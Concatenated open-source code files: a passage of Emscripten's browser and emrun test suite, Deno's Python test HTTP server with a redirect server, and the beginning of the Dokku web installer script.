self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind'] + self.get_async_args())
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_emrun(self):
self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
http_server.py | #!/usr/bin/env python
# Copyright 2018-2019 the Deno authors. All rights reserved. MIT license.
# Many tests expect there to be an http server on port 4545 servering the deno
# root directory.
import os
import sys
from threading import Thread
import SimpleHTTPServer
import SocketServer
from util import root_path
from time import sleep
PORT = 4545
REDIRECT_PORT = 4546
class ContentTypeHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if "multipart_form_data.txt" in self.path:
self.protocol_version = 'HTTP/1.1'
self.send_response(200, 'OK')
self.send_header('Content-type',
'multipart/form-data;boundary=boundary')
self.end_headers()
self.wfile.write(
bytes('Preamble\r\n'
'--boundary\t \r\n'
'Content-Disposition: form-data; name="field_1"\r\n'
'\r\n'
'value_1 \r\n'
'\r\n--boundary\r\n'
'Content-Disposition: form-data; name="field_2"; '
'filename="file.js"\r\n'
'Content-Type: text/javascript\r\n'
'\r\n'
'console.log("Hi")'
'\r\n--boundary--\r\n'
'Epilogue'))
return
return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
# Simple echo server for request reflection
if "echo_server" in self.path:
self.protocol_version = 'HTTP/1.1'
self.send_response(200, 'OK')
if self.headers.has_key('content-type'):
self.send_header('content-type',
self.headers.getheader('content-type'))
self.end_headers()
data_string = self.rfile.read(int(self.headers['Content-Length']))
self.wfile.write(bytes(data_string))
return
self.protocol_version = 'HTTP/1.1'
self.send_response(501)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('Server does not support this operation'))
def guess_type(self, path):
if ".t1." in path:
return "text/typescript"
if ".t2." in path:
return "video/vnd.dlna.mpeg-tts"
if ".t3." in path:
return "video/mp2t"
if ".t4." in path:
return "application/x-typescript"
if ".j1." in path:
return "text/javascript"
if ".j2." in path:
return "application/ecmascript"
if ".j3." in path:
return "text/ecmascript"
if ".j4." in path:
return "application/x-javascript"
if "form_urlencoded" in path:
return "application/x-www-form-urlencoded"
if "no_ext" in path:
return "text/typescript"
if "unknown_ext" in path:
return "text/typescript"
if "mismatch_ext" in path:
return "text/javascript"
return SimpleHTTPServer.SimpleHTTPRequestHandler.guess_type(self, path)
def server():
os.chdir(root_path) # Hopefully the main thread doesn't also chdir.
Handler = ContentTypeHandler
Handler.extensions_map.update({
".ts": "application/typescript",
".js": "application/javascript",
".json": "application/json",
})
SocketServer.TCPServer.allow_reuse_address = True
s = SocketServer.TCPServer(("", PORT), Handler)
print "Deno test server http://localhost:%d/" % PORT
return s
def redirect_server():
os.chdir(root_path)
target_host = "http://localhost:%d" % PORT
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', target_host + self.path)
self.end_headers()
Handler = RedirectHandler
SocketServer.TCPServer.allow_reuse_address = True
s = SocketServer.TCPServer(("", REDIRECT_PORT), Handler)
print "redirect server http://localhost:%d/ -> http://localhost:%d/" % (
REDIRECT_PORT, PORT)
return s
def spawn():
# Main http server
s = server()
thread = Thread(target=s.serve_forever)
thread.daemon = True
thread.start()
# Redirect server
rs = redirect_server()
r_thread = Thread(target=rs.serve_forever)
r_thread.daemon = True
r_thread.start()
sleep(1) # TODO I'm too lazy to figure out how to do this properly.
return thread
def main():
try:
thread = spawn()
while thread.is_alive():
sleep(10)
except KeyboardInterrupt:
pass
sys.exit(1)
if __name__ == '__main__':
main()
|
dokku-installer.py | #!/usr/bin/env python3
import cgi
import json
import os
import re
try:
import SimpleHTTPServer
import SocketServer
except ImportError:
import http.server as SimpleHTTPServer
import socketserver as SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.19.12'
def bytes_to_string(b):
if type(b) == bytes:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
b = b.decode(encoding)
b = b.strip()
return b
def string_to_bytes(s):
if type(s) == str:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
s = s.encode(encoding)
return s
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = bytes_to_string(subprocess.check_output(command, shell=True))
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', None)
if os.path.isfile('/home/ec2-user/.ssh/authorized_keys'):
key_file = '/home/ec2-user/.ssh/authorized_keys'
elif os.path.isfile('/home/ubuntu/.ssh/authorized_keys'):
key_file = '/home/ubuntu/.ssh/authorized_keys'
else:
key_file = '/root/.ssh/authorized_keys'
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = bytes_to_string(subprocess.check_output(command, shell=True)).strip().split("\n")
except subprocess.CalledProcessError:
pass
ufw_display = 'block'
try:
command = "sudo ufw status"
ufw_output = bytes_to_string(subprocess.check_output(command, shell=True).strip())
